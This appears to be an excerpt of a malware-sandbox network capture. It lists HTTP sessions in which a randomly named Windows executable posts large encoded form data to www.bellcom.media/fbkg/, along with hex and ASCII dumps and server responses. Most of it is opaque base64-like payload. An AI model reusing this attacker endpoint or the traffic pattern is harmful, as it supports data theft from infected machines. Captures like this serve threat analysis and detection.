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
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485375881 CET1265OUTData Raw: 6b 38 6b 6b 4c 52 31 45 65 75 65 70 47 5a 77 6b 4c 62 7a 63 4f 54 78 61 2b 4e 35 75 34 57 61 59 50 31 43 69 6a 68 51 72 6d 68 42 66 73 44 48 44 31 68 30 62 65 76 57 68 6a 72 64 48 5a 47 46 6e 67 4c 72 2b 7a 69 2b 6e 58 72 68 6d 63 30 70 52 6f 53
                                                                                                                                                                                                Data Ascii: k8kkLR1EeuepGZwkLbzcOTxa+N5u4WaYP1CijhQrmhBfsDHD1h0bevWhjrdHZGFngLr+zi+nXrhmc0pRoS6HfswVIoQvioBgNTtIQPZntGN8HBguku10I6RZTWFdqZqZ2EPNDdOvKYh4qQH8NMn+VQG0QNfy34YxsuPeZly3oCGogWllAu96eAraOq9tZUE+ZhTcuPy4mmRQHCV69JmeqbkaVPK7s9J/rQrCOYmTssi44wcarCS
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485491037 CET1272OUTData Raw: 55 70 72 69 49 75 39 6f 78 77 36 2b 6f 4e 63 4c 4d 78 37 31 6f 70 52 30 6e 57 2b 63 63 4a 65 56 57 54 49 37 30 4d 46 77 52 53 41 44 71 4d 4f 30 55 35 45 39 73 33 78 6b 6e 6f 6c 32 44 6b 41 4d 34 6f 6a 38 41 38 36 46 43 67 44 52 31 62 41 4b 2b 77
                                                                                                                                                                                                Data Ascii: UpriIu9oxw6+oNcLMx71opR0nW+ccJeVWTI70MFwRSADqMO0U5E9s3xknol2DkAM4oj8A86FCgDR1bAK+wMvyrA1+9ulppc1b0AbIA7XJJMVlnEy6VykAa6pOytndMuokMV2JK/CAvbFLyDvpcCSgZhh2BW+b6i8nFF0Yv2XKPs4TA7NMm0TPXy6tnchmjMGgCbMXpuYWQLxUN66/VnTCxlrNgKwT3rIVbPASXowku5QVbKCzbj
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485538006 CET1273INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:43 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485887051 CET1276OUTData Raw: 70 70 77 47 62 6a 73 72 7a 58 50 43 49 4f 6a 39 67 72 69 38 79 34 66 41 2b 4f 63 4a 45 33 38 64 74 39 64 34 61 4c 73 36 63 4c 71 63 67 59 4d 57 31 65 66 39 52 74 67 61 54 35 6f 44 71 50 4c 57 38 31 56 41 4b 77 44 54 31 57 44 42 47 46 65 53 6b 74
                                                                                                                                                                                                Data Ascii: ppwGbjsrzXPCIOj9gri8y4fA+OcJE38dt9d4aLs6cLqcgYMW1ef9RtgaT5oDqPLW81VAKwDT1WDBGFeSktl3DlolBayLcd56aI82Xxmoe5obB6D6tM0XDPBALn7UmrO5mnQrg9F3RyPLksXFDRFXwk6e2VUxnyOHAhRoU2vNB3zcowfdQBmou4YKZPJEm5QBieM0bUtzKP1fVg7hGWQytaO36C/LAO6LckuAn56RKp3duVIQqsd
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486054897 CET1280OUTData Raw: 36 6a 76 4f 52 44 4f 45 54 68 55 31 71 39 48 47 71 31 34 4c 66 53 50 70 58 75 47 69 70 72 44 72 73 34 39 48 6f 72 33 6a 4e 4f 31 65 55 56 37 54 35 48 51 66 41 74 4d 69 43 52 33 36 57 77 43 66 62 59 52 6e 6f 45 63 4a 49 46 73 59 5a 76 56 64 64 51
                                                                                                                                                                                                Data Ascii: 6jvORDOEThU1q9HGq14LfSPpXuGiprDrs49Hor3jNO1eUV7T5HQfAtMiCR36WwCfbYRnoEcJIFsYZvVddQzCB6wzXAIcMh6kDRGGXI8wqErw/dzFBGXGEzXprxIpPd4xFJocF4FK7U+oC4XDR0m8GRshT9ed3ZcAPsDfqE1KExHGJ13lN2Vy6e8EN65kzRIS2ZQbQo7MaWadut6+/HFv45Jswb64JpVmtVyIDG48vV1NTiZIntO
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486221075 CET1281OUTData Raw: 35 46 52 64 47 79 51 6a 51 38 51 31 63 61 73 76 63 48 43 6f 67 7a 57 38 37 4a 66 78 7a 70 6a 50 67 33 4b 4a 43 51 62 46 41 6f 74 2b 49 61 53 35 63 53 48 48 52 2b 33 39 47 65 6c 73 73 59 47 30 4b 54 39 37 31 50 33 52 2b 38 31 71 59 75 55 6b 4d 36
                                                                                                                                                                                                Data Ascii: 5FRdGyQjQ8Q1casvcHCogzW87JfxzpjPg3KJCQbFAot+IaS5cSHHR+39GelssYG0KT971P3R+81qYuUkM6+Z1TcUvvpTyploxtoHfhSBxfG7oQeJDssjXdzKefq0Hd5x8+3+xaHaFRZU2VCPHJexhsttuPw20pOe1EmtZ+yCmL7NiEredatEp6oIdTWKwVfJ+0qUpNPoxn61hpSUyEzkXWPzM/x4LF53A2I4vJJTGL6GIJBp3yh
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486392021 CET1284OUTData Raw: 57 59 74 6a 30 58 71 50 34 35 64 71 35 49 5a 34 75 42 61 47 38 59 61 68 79 39 37 65 70 6f 54 45 4a 53 62 31 55 36 59 79 55 2f 6b 54 6a 59 73 35 4c 62 74 50 6e 61 48 5a 57 57 47 65 6f 48 6c 5a 4f 44 45 71 7a 49 36 66 6d 50 64 43 35 53 6b 49 67 4f
                                                                                                                                                                                                Data Ascii: WYtj0XqP45dq5IZ4uBaG8Yahy97epoTEJSb1U6YyU/kTjYs5LbtPnaHZWWGeoHlZODEqzI6fmPdC5SkIgORwkT7mfhvhKSijACGB8ccIQZBmofWIvpEy4bRrRvVhBmV8Q045T8XfjQXbSWXp0GYJsdCH5B5x+iWGjp2rSRqiHgn9UEkqve0hFP0MwOV4ntu1tkD4TwFTGKoRHH0jmstHAN/OdEqhV48imxFr1AabL3UiqbgLe3z
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673955917 CET1291OUTData Raw: 4e 38 57 66 6e 39 4d 48 62 35 70 75 63 49 53 62 71 65 79 6d 36 4b 54 72 6b 6a 32 77 75 76 54 48 45 58 34 2f 54 51 51 61 52 58 6f 6e 73 51 37 7a 59 64 66 47 64 6c 56 58 69 41 79 46 4c 31 57 33 43 71 6f 57 30 51 71 32 63 44 2b 66 6e 4c 77 34 6a 2b
                                                                                                                                                                                                Data Ascii: N8Wfn9MHb5pucISbqeym6KTrkj2wuvTHEX4/TQQaRXonsQ7zYdfGdlVXiAyFL1W3CqoW0Qq2cD+fnLw4j+5g+c9khP4QaDNZYUZxL+g9TS4vSlxR2nXjxxLkRUjMWIjz9Lr39LFJjy3t/Nsnl2H7NPQwObFzyP60aoIk4mKy5gXDLLTAfoJLBkAJ9FTv6PPzlNcQOolGa7ou3ZfmQLRPdgH1GK/vuxAtpIkD9y+j85gfW3ZyUii
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674063921 CET1298OUTData Raw: 73 56 43 4d 6e 65 7a 71 58 34 30 56 4e 69 4d 67 37 4c 37 5a 4b 7a 42 41 78 30 68 4a 59 54 48 48 4a 33 4b 49 6b 56 38 6a 75 7a 45 78 48 79 73 46 44 47 35 57 4f 69 39 79 46 39 48 73 45 74 39 62 43 72 7a 70 62 37 42 67 6f 46 6c 78 44 6e 4b 43 32 72
                                                                                                                                                                                                Data Ascii: sVCMnezqX40VNiMg7L7ZKzBAx0hJYTHHJ3KIkV8juzExHysFDG5WOi9yF9HsEt9bCrzpb7BgoFlxDnKC2rAYnEYjjzG6URs+PmLot8c3qd7Ul9sOpaDu/bAP30p2SKXmgXpQbOb7uT9Npl7lfWFiRYhZ+QlHcvEOFc1uRrYKTFvjp6D8U4UWJypMNoCEqnv/MMM4AiHPxdN5+IlMlcyPiSMSQolrv86gLFDSZP7JjkThuDpCTBm


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6291.195.240.12380192.168.11.2050189C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:43.295444965 CET1257OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 67 5a 35 4d 64 71 59 57 34 42 6f 35 53 38 57 4b 59 37 42 4e 43 78 6f 71 32 78 45 47 37 41 6f 76 55 65 46 53 32 79 35 37 4a 36 38 6d 4e 4b 4d 64 72 73 74 6a 78 42 48 75 53 77 31 32 6d 73 79 46 4e 4c 72 32 69 70 30 41 45 61 75 32 57 32 54 5a 69 59 6c 73 6c 62 67 49 79 39 66 73 30 42 66 6f 4d 48 49 70 6a 56 38 53 76 78 46 67 35 4b 4d 6a 37 6e 38 63 36 34 52 4d 33 65 4b 64 4a 62 31 73 6b 62 4e 6e 7a 35 39 6c 58 54 46 46 34 7a 52 48 38 63 6b 39 73 57 38 4d 54 55 37 4b 68 5a 56 57 30 76 32 4e 68 44 65 4c 68 6b 53 58 70 43 56 4d 6a 4d 64 7a 49 66 73 4b 57 7a 34 6c 31 44 4e 4a 44 34 35 58 31 34 64 6a 77 64 42 65 44 61 65 37 78 37 63 62 4a 30 35 4b 34 75 4a 5a 4b 41 4f 38 50 76 42 36 76 39 47 67 48 6a 55 79 6a 77 30 37 57 32 6d 6e 41 62 4e 30 35 4a 6f 4c 6b 64 64 64 6d 6a 4d 79 55 5a 57 62 56 38 68 43 35 59 46 63 4e 4d 46 6f 57 7a 6f 79 6b 73 2b 2b 76 77 59 78 56 51 77 4f 46 79 59 4d 50 6c 63 70 65 56 48 38 45 2f 50 68 79 5a 33 6d 69 65 56 39 39 74 32 63 37 71 46 77 37 71 4b 45 43 41 44 69 4b 36 63 4b 4d 41 34 75 53 61 57 74 45 62 48 73 48 30 4a 51 4d 4a 76 31 6d 36 72 79 6e 73 6a 35 57 45 38 42 4e 4e 47 32 35 74 76 6f 47 6a 49 4e 67 65 50 33 31 57 45 32 34 2b 67 37 6e 43 64 62 50 31 2f 52 78 66 55 6d 6d 4d 32 49 46 42 31 58 4a 64 4e 67 49 32 34 53 45 45 74 35 4f 57 45 4c 61 57 35 44 6f 4c 70 73 31 4d 6d 58 68 71 54 55 76 78 66 52 4f 59 70 54 6f 2f 70 54 32 30 47 47 6e 77 39 55 69 72 45 33 48 52 6a 69 64 43 57 36 49 4f 66 68 35 47 34 30 69 74 75 42 38 2f 35 41 47 38 52 39 6e 43 4e 41 55 73 4d 4e 75 42 49 6c 73 76 55 30 58 61 6d 41 54 68 31 38 43 77 64 59 63 71 30 52 71 6a 6b 45 30 62 5a 65 4a 61 6a 49 74 50 47 58 4b 56 6e 58 39 69 52 45 70 64 36 2f 38 54 61 34 69 4e 67 37 67 74 6c 4d 6a 52 64 66 44 4f 4d 46 78 44 35 39 44 33 53 56 51 53 6a 70 34 53 7a 74 49 6c 39 54 68 33 79 52 58 76 62 79 55 42 2b 6c 73 56 69 42 71 4f 62 73 61 4f 67 31 55 34 53 47 48 39 39 46 79 49 41 33 44 2f 4a 66 41 37 39 57 74 49 6f 6c 35 41 54 36 38 66 69 2f 77 72 50 4c 76 74 75 53 79 47 73 75 78 50 61 68 50 6c 6c 4c 31 38 68 36 7a 6d 79 61 34 74 58 71 61 7a 49 6f 76 66 4f 38 6b 65 59 41 63 6c 77 46 5a 62 4f 36 56 57 50 54 36 6e 50 49 4b 53 50 57 6b 6e 74 6f 71 44 71 65 49 54 49 6b 63 6b 4a 73 2b 55 5a 6c 30 70 57 34 76 51 68 66 6a 36 54 46 6d 6a 79 31 30 4f 38 45 72 59 6a 7a 76 73 4b 44 36 31 5a 4d 57 54 2b 71 32 34 49 71 4f 58 4c 57 6f 4f 37 4c 4c 38 52 52 75 75 30 65 38 4e 38 49 51 51 48 51 7a 67 39 4d 57 65 79 75 2f 53 50 39 31 7a 42 48 52 72 45 74 54 38 77 52 55 74 78 34 37 6d 43 67 4f 64 6e 56 6c 57 39 77 62 70 6d 77 4d 65 5a 61 63 4e 49 41 51 70 48 6d 68 4d 51 4c 48 57 5a 66 42 55 52 37 39 69 38 61 31 76 4c 5a 66 67 49 35 4b 4b 51 61 42 32 44 72 52 6a 70 54 6a 6a 72 36 68 66 67 6e 61 2f 31 79 75 5a 61 32 6b 6b 71 74 6e 6c 52 70 39 49 39 2f 77 39 46 77 44 52 39 59 76 68 34 54 33 63 7a 6a 36 69 48 6c 39 64 63 43 31 37 6e 34 5a 43 6a 6e 62 6d 79 4d 65 2f 56 51 44 56 74 43 41 5a 6e 2b 6d 43 41 6f 2b 7a 66 2f 72 56 6b 30 5a 78 51 4b 57 41 46 4f 37 33 6f 48 59 46 35 6e 39 35 58 66 6b 2f 72 50 64 2f 52 39 42 44 36 38 6a 37 79 4b 66 76 4d 75 32 74 4f 6c 6a 4e 6e 45 78 4d 2f 42 32 6d 6e 70 30 34 45 4d 4e 61 37 54 70 2b 46 37 42 72 72 32 4d 2b 53 31 73 77 56 64 66 31 4f 42 51 59 65 35 71 4d 42 34 57 72 62 2f 46 72 56 46 38 5a 42 35 78 2b 4c 50 57 70 41 54 45 38 32 33 50 68 41 67 47 50 31 41 59 56 63 51 35 4a 34 33 47 72 41 4f 38 37 47 58 35 55 52 78 65 7a 38 51 48 37 4a 35 70 65 48 54 4c 4a 32 64 59 53 6c 6e 31 78 71 49 45 6d 6e 51 73 2f 76 62 31 79 49 79 33 49 38 58 6b 32 71 49 54 69 4d 32 78 43 63 38 50 65 69 32 53 49 7a 6f 47 59 54 59 55 5a 47 33 43 78 36 62 4c 7a 45 69 49 4f 2b 78 61 56 6d 6d 6a 35 64 37 4a 6d 69 4e 41 54 55 71 42 72 54 77 30 43 53 34 57 6a 54 6a 59 32 4b 6e 43 52 2f 59 50 32 6f 4b 49 56 6e 6b 46 5a 4d 78 6f 7a 59 75 55 63 56 47 41 67 57 48 62 4c 37 74 78 43 4b 4a 55 57 46 45 66 35 42 43 46 43 69 4d 69 35 42 73 72 71 4b 53 4e 78 6d 32 73 48 54 42 39 41 37 74 79 6b 2b 62 6c 48 65 2b 4c 68 79 74 6f
                                                                                                                                                                                                Data Ascii: T6I=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